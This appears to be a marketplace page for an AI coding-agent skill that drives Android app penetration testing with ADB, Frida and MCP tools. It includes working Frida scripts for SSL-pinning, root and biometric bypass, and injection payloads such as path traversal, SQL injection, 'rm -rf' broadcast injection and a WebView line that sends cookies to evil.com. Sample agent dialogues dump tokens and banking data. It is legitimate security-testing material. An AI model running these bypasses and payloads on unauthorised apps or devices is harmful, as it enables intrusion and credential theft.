login
hardw00t

android-pentest

by @hardw00t in Development
16
3
# Install this skill:
npx skills add hardw00t/ai-security-arsenal --skill "android-pentest"

Install specific skill from multi-skill repository

# Description

Comprehensive Android mobile application penetration testing skill with full ADB shell access to rooted devices. This skill should be used when performing security assessments on Android applications including static analysis, dynamic analysis, runtime manipulation, traffic interception, and vulnerability identification. Triggers on requests to pentest Android apps, test mobile security, analyze APKs, bypass security controls, or perform OWASP Mobile Top 10 assessments. (user)

# SKILL.md

name: android-pentest
description: "Comprehensive Android mobile application penetration testing skill with full ADB shell access to rooted devices. This skill should be used when performing security assessments on Android applications including static analysis, dynamic analysis, runtime manipulation, traffic interception, and vulnerability identification. Triggers on requests to pentest Android apps, test mobile security, analyze APKs, bypass security controls, or perform OWASP Mobile Top 10 assessments. (user)"

Android Mobile Application Penetration Testing

This skill enables comprehensive security testing of Android applications through ADB shell access to a rooted Android device and the Android Dynamic MCP server. It covers the full OWASP MASTG methodology from reconnaissance to exploitation and reporting.

When to Use This Skill

This skill should be invoked when:
- Starting a new Android application security assessment
- Performing dynamic analysis on Android apps
- Bypassing security controls (SSL pinning, root detection, anti-tampering)
- Extracting and analyzing application data
- Testing authentication and authorization mechanisms
- Analyzing network communications
- Fuzzing application components (activities, services, content providers, broadcast receivers)
- Performing OWASP MASTG compliance testing
- Writing penetration test reports

Trigger Phrases

  • "pentest this Android app"
  • "security test the APK"
  • "bypass SSL pinning on [app]"
  • "extract data from [app]"
  • "test Android authentication"
  • "fuzz Android intents"
  • "MASTG testing for [app]"
  • "mobile app security assessment"

Prerequisites

Required Tools

Tool Purpose Installation
ADB Device communication apt install adb or Android SDK
Frida Dynamic instrumentation pip install frida-tools
Objection Mobile exploration pip install objection
apktool APK decompilation apt install apktool
jadx Java decompilation Download from GitHub
Burp Suite Traffic interception Download from PortSwigger
Android Studio Emulator/tools Download from Google

MCP Server Setup

The Android Dynamic MCP server provides comprehensive tooling. Ensure it's configured:

// ~/.claude/mcp.json
{
  "mcpServers": {
    "android-pentest": {
      "command": "python",
      "args": ["/path/to/android-dynamic/server.py"]
    }
  }
}

Mobile MCP for Device Interaction

For advanced device, emulator, and simulator interactions, use Mobile MCP:
- Repository: https://github.com/mobile-next/mobile-mcp
- Purpose: Provides MCP-based interaction with Android emulators and physical devices
- Features: Screen capture, touch automation, app lifecycle management, and UI inspection

// Add to ~/.claude/mcp.json
{
  "mcpServers": {
    "mobile-mcp": {
      "command": "npx",
      "args": ["-y", "@anthropic/mobile-mcp", "--android"]
    }
  }
}

This complements Frida/Objection for scenarios requiring direct device UI interaction.

Device Setup

Physical Device

# 1. Enable Developer Options (tap Build Number 7 times)
# 2. Enable USB Debugging
# 3. Root device (Magisk recommended)

# Install Frida server
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell "su -c '/data/local/tmp/frida-server -D &'"

Emulator

# Use Android Studio emulator with Google APIs (not Play Store)
# Root with rootAVD or system image without Google Play
# Match Frida server architecture (x86_64 for most emulators)

Verification

# Verify ADB connection
adb devices

# Verify root access
adb shell su -c "id"

# Verify Frida connection
frida-ps -U

# Test MCP server
# In Claude Code: get_app_info("com.android.settings")

Quick Start Guide

1. Initial Setup (2 minutes)

User: I need to pentest the app com.example.targetapp

Claude: I'll set up the testing environment.

[MCP Tool Sequence]
1. get_app_info("com.example.targetapp")
   β†’ Version, permissions, SDK levels, signatures

2. pull_apk("com.example.targetapp")
   β†’ Extract APK for static analysis

3. list_exported_components("com.example.targetapp")
   β†’ Map attack surface (activities, services, providers, receivers)

2. Bypass Security Controls (1 minute)

[MCP Tool Sequence]
1. frida_spawn("com.example.targetapp")
   β†’ PID: 12345

2. frida_bypass_ssl(12345)
   β†’ SSL pinning disabled

3. frida_bypass_root(12345)
   β†’ Root detection bypassed

4. setup_proxy("device-id", "192.168.1.100", 8080)
   β†’ Traffic interception ready

3. Dynamic Analysis

[MCP Tool Sequence]
1. frida_run_script(12345, "crypto_hooks.js")
2. frida_run_script(12345, "credential_hooks.js")
3. frida_run_script(12345, "intent_monitor.js")
4. get_logcat("com.example.targetapp")

4. Data Extraction

[MCP Tool Sequence]
1. dump_databases("com.example.targetapp")
2. dump_shared_prefs("com.example.targetapp")
3. dump_internal_storage("com.example.targetapp")
4. dump_external_storage("com.example.targetapp")

Methodology Reference

Document Coverage
methodology/recon.md Information gathering, attack surface mapping
methodology/static_analysis.md APK analysis, code review, secrets detection
methodology/dynamic_analysis.md Runtime testing, hooking, instrumentation
methodology/network_testing.md Traffic analysis, API testing, TLS verification
methodology/data_storage.md Local storage, databases, file permissions
methodology/crypto_testing.md Encryption analysis, key management
methodology/auth_testing.md Authentication, session management, biometrics
methodology/client_side_injection.md WebViews, deep links, content providers

Common Workflows with MCP Tool Sequences

Workflow 1: Complete Application Assessment

# Phase 1: Reconnaissance
get_app_info("com.target.app")
pull_apk("com.target.app")
list_exported_components("com.target.app")

# Phase 2: Bypass Protections
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
frida_bypass_root(pid)
setup_proxy(device_id, "192.168.1.100", 8080)

# Phase 3: Dynamic Analysis
frida_run_script(pid, "crypto_hooks.js")
frida_run_script(pid, "credential_hooks.js")
frida_run_script(pid, "intent_monitor.js")

# Phase 4: Data Extraction
dump_databases("com.target.app")
dump_shared_prefs("com.target.app")
dump_internal_storage("com.target.app")

# Phase 5: Component Testing
launch_activity("com.target.app", ".DeepLinkActivity",
                extras={"url": "javascript:alert(1)"})
query_content_provider("content://com.target.app.provider/users")
fuzz_intent_extra("com.target.app", ".ProcessActivity",
                  "data", ["../../../etc/passwd", "' OR '1'='1"])

# Phase 6: Network Testing
capture_traffic_start("com.target.app")
# [interact with app]
capture_traffic_stop()

Workflow 2: SSL Pinning Bypass

# Method 1: Universal Frida bypass (most apps)
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)

# Method 2: Custom script for specific library
frida_run_script(pid, """
Java.perform(function() {
    var CustomPinner = Java.use('com.target.app.security.Pinner');
    CustomPinner.verify.implementation = function() {
        console.log('[+] Bypassed custom pinner');
        return true;
    };
});
""")

# Method 3: If app uses flutter_ssl_pinning
frida_run_script(pid, """
var flutter = Process.findModuleByName("libflutter.so");
Interceptor.attach(Module.findExportByName("libssl.so", "SSL_CTX_set_custom_verify"), {
    onEnter: function(args) {
        args[2] = new NativeCallback(function() { return 0; }, 'int', ['pointer', 'pointer']);
    }
});
""")

Workflow 3: Authentication Testing

# Hook authentication methods
frida_hook_method(pid, "com.target.app.auth.AuthService", "login")
frida_hook_method(pid, "com.target.app.auth.TokenValidator", "validateToken")

# Biometric bypass
frida_run_script(pid, "biometric_bypass.js")

# Credential monitoring
frida_run_script(pid, "credential_hooks.js")

# Session manipulation
frida_hook_method(pid, "com.target.app.session.SessionManager", "*")

# Map attack surface
components = list_exported_components("com.target.app")

# Test deep links
launch_activity("com.target.app", ".DeepLinkActivity",
                data_uri="targetapp://transfer?amount=1000&to=attacker")

# XSS in WebView
launch_activity("com.target.app", ".WebViewActivity",
                extras={"url": "javascript:document.location='http://evil.com/?c='+document.cookie"})

# Path traversal in file handling
fuzz_intent_extra("com.target.app", ".FileActivity", "filepath", [
    "../../../data/data/com.other.app/databases/secrets.db",
    "file:///data/local/tmp/evil.html",
    "content://com.target.app.provider/../../../etc/passwd"
])

# Content provider SQL injection
query_content_provider("content://com.target.app.provider/users?id=1' OR '1'='1' --")

# Broadcast injection
send_broadcast("com.target.app.CUSTOM_ACTION",
               extras={"command": "; rm -rf /sdcard/*"})

Workflow 5: Cryptography Analysis

# Hook all crypto operations
frida_run_script(pid, "crypto_hooks.js")

# Detect weak algorithms
frida_run_script(pid, """
Java.perform(function() {
    var Cipher = Java.use('javax.crypto.Cipher');
    Cipher.getInstance.overload('java.lang.String').implementation = function(algo) {
        console.log('[CRYPTO] Algorithm: ' + algo);
        if (algo.indexOf('ECB') !== -1) console.log('[!] WEAK: ECB mode');
        if (algo.indexOf('DES') !== -1) console.log('[!] WEAK: DES');
        if (algo.indexOf('RC4') !== -1) console.log('[!] WEAK: RC4');
        return this.getInstance(algo);
    };
});
""")

# Search for hardcoded keys
frida_memory_search(pid, "-----BEGIN RSA PRIVATE KEY-----")
frida_memory_search(pid, "AES_SECRET_KEY")

# Dump encryption keys at runtime
frida_hook_method(pid, "javax.crypto.spec.SecretKeySpec", "$init")

Workflow 6: Data Exfiltration Analysis

# Full data dump
databases = dump_databases("com.target.app")
prefs = dump_shared_prefs("com.target.app")
internal = dump_internal_storage("com.target.app")
external = dump_external_storage("com.target.app")
logs = get_logcat("com.target.app")

# Analyze for sensitive data
# Look for: tokens, passwords, PII, financial data, session IDs

# Monitor data writes in real-time
frida_run_script(pid, """
Java.perform(function() {
    var SharedPrefs = Java.use('android.app.SharedPreferencesImpl$EditorImpl');
    SharedPrefs.putString.implementation = function(key, value) {
        console.log('[PREFS] ' + key + ' = ' + value);
        return this.putString(key, value);
    };
});
""")

MCP Tool Reference

Device Interaction

Tool Description Example
get_screen_state() Current screen/UI elements Finding clickable elements
tap_element(x, y) Tap at coordinates Automating login flow
input_text(text) Type into focused field Entering credentials
press_key(keycode) Press key BACK=4, HOME=3, ENTER=66
swipe(x1, y1, x2, y2) Swipe gesture Scrolling, pattern unlock
long_press(x, y) Long press Context menus

Frida Instrumentation

Tool Description Example
frida_spawn(package) Start with Frida Initial attachment
frida_attach(package) Attach to running Already running app
frida_run_script(pid, script) Run Frida script Custom hooks
frida_bypass_ssl(pid) Bypass SSL pinning Enable interception
frida_bypass_root(pid) Bypass root detection Evade security
frida_hook_method(pid, class, method) Hook method Trace calls
frida_trace_crypto(pid) Trace crypto Key extraction
frida_dump_credentials(pid) Dump credentials Credential theft
frida_enumerate_classes(pid, pattern) List classes Class discovery
frida_memory_search(pid, pattern) Search memory Find secrets

Network Tools

Tool Description Example
setup_proxy(device, host, port) Configure proxy Burp interception
clear_proxy(device) Remove proxy Cleanup
install_ca_cert(device, path) Install CA cert Trust Burp CA
capture_traffic_start(package) Start capture Record traffic
capture_traffic_stop() Stop capture Save PCAP

Data Extraction

Tool Description Example
dump_databases(package) Extract SQLite DBs User data, creds
dump_shared_prefs(package) Get preferences Tokens, settings
dump_internal_storage(package) Internal files Config, certs
dump_external_storage(package) SD card files Exports, cache
get_logcat(package) Filtered logs Debug info leak

Component Testing

Tool Description Example
list_exported_components(package) Map attack surface Find entry points
launch_activity(pkg, activity, extras) Start activity Deep link test
send_broadcast(action, extras) Send broadcast Broadcast injection
start_service(pkg, service, extras) Start service Service abuse
query_content_provider(uri) Query provider Data leakage
fuzz_intent_extra(pkg, comp, key, payloads) Fuzz intents Find vulns

App Management

Tool Description Example
install_apk(path) Install APK Deploy test build
uninstall_app(package) Remove app Cleanup
clear_app_data(package) Clear data Fresh state
get_app_info(package) App metadata Permissions, SDK
list_installed_apps() All packages Discovery
pull_apk(package) Extract APK Static analysis

Frida Script Library

Pre-built scripts in /scripts/ directory:

Script Purpose
ssl_pinning_bypass.js Universal SSL/TLS pinning bypass
root_bypass.js Root detection bypass
crypto_hooks.js Cryptographic operation monitoring
credential_hooks.js Credential capture
network_hooks.js Network traffic monitoring
biometric_bypass.js Biometric authentication bypass
anti_tampering_bypass.js Anti-tampering/debugger bypass
intent_monitor.js Intent/IPC monitoring
webview_hooks.js WebView security monitoring
dynamic_dex_hooks.js Dynamic code loading detection
keystore_hooks.js Android Keystore monitoring
method_tracer.js Generic method tracing

Troubleshooting Guide

Frida Issues

"Failed to spawn: unable to find application"

# Solution: Verify package name
list_installed_apps() | grep <partial_name>
adb shell pm list packages | grep <partial_name>

"Failed to attach: process not found"

# Solution: App not running, use spawn instead
pid = frida_spawn("com.target.app")  # Instead of frida_attach

"Script terminated with error"

# Solution: Class/method not found
frida_enumerate_classes(pid, "*TargetClass*")  # Find exact class
# Check for obfuscation - class names may be: a, b, c, etc.

Frida server crashes

# Solution: Version mismatch
frida --version  # Check client version
# Download matching server from https://github.com/frida/frida/releases

SSL Pinning Issues

Universal bypass doesn't work

# Solution: Custom pinning implementation
1. Decompile APK with jadx
2. Search: "certificate", "pin", "ssl", "trust"
3. Identify custom class and method
4. Write targeted Frida hook

# Check for: OkHttp CertificatePinner, custom TrustManager,
# native SSL verification, Network Security Config

App still fails after bypass

# Solution: Multiple pinning layers
1. Check for native SSL verification (libssl.so)
2. Use anti_tampering_bypass.js for Frida detection bypass
3. Try objection: android sslpinning disable
4. Consider frida-gadget for persistent injection

Root Detection Issues

App detects root and exits

# Solution: Multiple detection vectors
1. Use comprehensive root_bypass.js
2. Enable Magisk Hide / Zygisk DenyList
3. Check for native root checks (hook fopen, access)
4. Consider frida-gadget embedded in APK

App detects Frida

# Solution: Frida detection in place
1. Use anti_tampering_bypass.js first
2. Rename frida-server binary
3. Use frida-gadget instead
4. Hook pthread_create to hide Frida threads

ADB Issues

"device unauthorized"

adb kill-server
adb start-server
# Accept prompt on device

"Permission denied" for data

adb root  # If using userdebug build
adb shell su -c "cat /data/data/<pkg>/..."  # With root

Data Extraction Issues

Database is encrypted (SQLCipher)

# Hook to capture password
frida_hook_method(pid, "net.sqlcipher.database.SQLiteDatabase", "openOrCreateDatabase")

# Or search memory for key
frida_memory_search(pid, "x]@1#%hJ")  # Common patterns

Checklists Reference

Checklist Purpose
checklists/owasp_mastg_full.md Complete MASTG compliance
checklists/quick_wins.md Fast vulnerability finding
checklists/pre_engagement.md Setup verification
checklists/report_items.md Report completeness

Templates Reference

Template Purpose
templates/finding_template.md Individual finding docs
templates/executive_summary.md Management summary
templates/technical_report.md Full technical report
templates/remediation_guide.md Developer fixes

Example Claude Code Interactions

Example 1: Starting New Assessment

User: I need to pentest com.megabank.mobile. It has SSL pinning and root
detection.

Claude: I'll set up the testing environment for com.megabank.mobile.

[Executes MCP tools]

1. Getting app information:
   > get_app_info("com.megabank.mobile")

   Version: 3.2.1, Target SDK: 33, Min SDK: 26
   Permissions: INTERNET, CAMERA, BIOMETRIC, READ_CONTACTS...

2. Extracting APK:
   > pull_apk("com.megabank.mobile")

   Saved to: /tmp/com.megabank.mobile.apk

3. Mapping attack surface:
   > list_exported_components("com.megabank.mobile")

   Exported Activities:
   - com.megabank.mobile.DeepLinkActivity (intent-filter: megabank://)
   - com.megabank.mobile.ShareReceiveActivity

   Content Providers:
   - com.megabank.mobile.provider.DocumentProvider (exported)

   Broadcast Receivers:
   - com.megabank.mobile.PushReceiver

4. Starting with Frida and bypassing protections:
   > frida_spawn("com.megabank.mobile")
   PID: 12345

   > frida_bypass_ssl(12345)
   [+] SSL pinning bypass active - hooked 8 methods

   > frida_bypass_root(12345)
   [+] Root detection bypass active

5. Configuring traffic interception:
   > setup_proxy("emulator-5554", "192.168.1.100", 8080)
   [+] Proxy configured

Environment ready. I've identified 3 potential entry points for testing:
1. Deep link handler (megabank://) - test for URL scheme hijacking
2. DocumentProvider - test for path traversal
3. PushReceiver - test for broadcast injection

Would you like me to proceed with dynamic analysis or test specific components?

Example 2: Data Storage Investigation

User: Check what sensitive data this app stores locally

Claude: I'll perform comprehensive data storage analysis.

[Executes MCP tools]

1. SharedPreferences analysis:
   > dump_shared_prefs("com.megabank.mobile")

   [!] FINDING in auth_prefs.xml:
   - auth_token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
   - refresh_token: "dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4..."
   - pin_hash: "5e884898da28047d9166..."

   Severity: HIGH - Authentication tokens stored in plaintext
   MASTG: MASTG-TEST-0001 (Insecure Data Storage)

2. Database analysis:
   > dump_databases("com.megabank.mobile")

   Found: app_data.db (356 KB)

   [!] FINDING:
   - Table 'accounts': account_number, balance, last_transaction
   - Table 'transactions': 847 records with transaction history
   - Table 'cached_credentials': username, password_hash

   Severity: HIGH - Financial data in unencrypted database
   MASTG: MASTG-TEST-0001

3. Internal storage:
   > dump_internal_storage("com.megabank.mobile")

   [!] FINDING: /files/user_profile.json
   Contains: full_name, email, phone, ssn_last_4

   Severity: MEDIUM - PII in plaintext file

4. External storage:
   > dump_external_storage("com.megabank.mobile")

   [!] FINDING: /Android/data/com.megabank.mobile/files/exports/
   - statements_2024.pdf (world-readable)

   Severity: MEDIUM - Sensitive docs on external storage
   MASTG: MASTG-TEST-0003

Summary:
| Finding | Severity | MASTG ID |
|---------|----------|----------|
| Auth tokens in SharedPreferences | High | MASTG-TEST-0001 |
| Unencrypted SQLite database | High | MASTG-TEST-0001 |
| PII in plaintext files | Medium | MASTG-TEST-0002 |
| Docs on external storage | Medium | MASTG-TEST-0003 |

Example 3: Authentication Bypass

User: Test the authentication for vulnerabilities

Claude: I'll test authentication mechanisms comprehensively.

[Executes MCP tools]

1. Hooking authentication flow:
   > frida_run_script(12345, "credential_hooks.js")

   [HOOK] SharedPreferences write: auth_token = eyJ...
   [HOOK] HTTP Header: Authorization: Bearer eyJ...

2. Biometric testing:
   > frida_run_script(12345, "biometric_bypass.js")

   [HOOK] BiometricPrompt.authenticate() called
   [BYPASS] Simulating successful authentication

   [!] FINDING: Biometric bypass successful
   - App accepts fake biometric success callback
   - No server-side verification

   Severity: HIGH - Authentication bypass
   MASTG: MASTG-TEST-0015

3. Session analysis:
   > frida_hook_method(12345, "com.megabank.mobile.auth.SessionManager", "*")

   [HOOK] validateSession(): Only checks local JWT expiry
   [HOOK] refreshSession(): No server round-trip

   [!] FINDING: Client-side session validation
   - JWT expiry can be modified locally
   - Sessions never verified server-side

   Severity: HIGH - Broken session management
   MASTG: MASTG-TEST-0016

4. Token analysis:
   > frida_run_script(12345, """
   Java.perform(function() {
       var JWT = Java.use('com.auth0.jwt.JWT');
       JWT.decode.implementation = function(token) {
           console.log('[JWT] ' + token);
           return this.decode(token);
       };
   });
   """)

   [!] FINDING: JWT uses HS256 (weak algorithm)
   [!] FINDING: JWT contains: account_id, role, permissions

Findings Summary:
| Issue | Severity | Impact |
|-------|----------|--------|
| Biometric bypass | High | Full account access |
| Client-side sessions | High | Persistent unauthorized access |
| Weak JWT algorithm | Medium | Potential token forgery |

Bundled Resources

scripts/

  • ssl_pinning_bypass.js - Universal SSL pinning bypass
  • root_bypass.js - Root detection bypass
  • crypto_hooks.js - Crypto operation monitoring
  • keystore_hooks.js - Android Keystore hooks
  • method_tracer.js - Generic method tracing
  • extract_apk.py - APK extraction tool
  • content_provider_scanner.py - Content provider enumeration
  • intent_fuzzer.py - Intent fuzzing automation

references/

  • owasp_mobile_top10.md - OWASP Mobile Top 10
  • android_security_checklist.md - Testing checklist
  • frida_snippets.md - Common Frida code snippets

# Related Skills

facebook
feature-flags @facebook

Use when feature flag tests fail, flags need updating, understanding @gate pragmas, debugging...

β˜… 242,571
facebook
fix @facebook

Use when you have lint errors, formatting issues, or before committing code to ensure it passes CI.

β˜… 242,571
facebook
flags @facebook

Use when you need to check feature flag states, compare channels, or debug why a feature behaves...

β˜… 242,571

# Supported AI Coding Agents

This skill is compatible with the SKILL.md standard and works with all major AI coding agents:

⚑ Amp πŸš€ Antigravity πŸ€– Claude Code πŸ¦€ Clawdbot πŸ“ Codex ▢️ Cursor πŸ€– Droid πŸ’Ž Gemini CLI πŸ™ GitHub Copilot πŸͺΏ Goose πŸ“Š Kilo Code πŸ”§ Kiro CLI πŸ’» OpenCode 🦘 Roo Code 🌲 Trae πŸ„ Windsurf

Learn more about the SKILL.md standard and how to use these skills with your preferred AI coding agent.